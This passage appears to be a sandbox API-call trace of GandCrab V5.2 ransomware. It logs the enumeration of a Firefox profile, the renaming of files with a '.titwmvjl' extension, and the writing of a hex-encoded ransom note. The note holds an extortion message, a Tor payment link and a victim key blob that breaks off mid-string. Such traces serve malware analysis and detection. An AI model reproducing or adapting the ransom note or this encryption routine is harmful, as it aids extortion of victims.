lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\d2ca4a09d2ca4deb61a.lock" [0084.901] lstrlenW (lpString=".titwmvjl") returned 9 [0084.901] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\d2ca4a09d2ca4deb61a.lock") returned 171 [0084.901] VirtualAlloc (lpAddress=0x0, dwSize=0x196, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0084.901] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 180 [0084.901] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\d2ca4a09d2ca4deb61a.lock") returned 171 [0084.901] lstrlenW (lpString=".lock") returned 5 [0084.901] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0084.901] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".lock ") returned 6 [0084.901] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.901] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.902] FindNextFileW (in: hFindFile=0x5037b8, lpFindFileData=0x259db5c | out: lpFindFileData=0x259db5c) returned 1 [0084.902] lstrcmpW (lpString1="journals", lpString2=".") returned 1 [0084.902] lstrcmpW (lpString1="journals", lpString2="..") returned 1 [0084.902] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\", lpString2="journals" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\journals") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\journals" [0084.902] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\journals", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\journals\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\journals\\" [0084.902] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0084.902] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0084.902] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0084.902] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0084.902] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0084.902] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0084.903] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0084.903] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0084.903] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0084.903] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.903] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0084.903] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\journals\\\\TITWMVJL-DECRYPT.txt") returned 177 [0084.903] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\journals\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\journals\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0084.904] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x7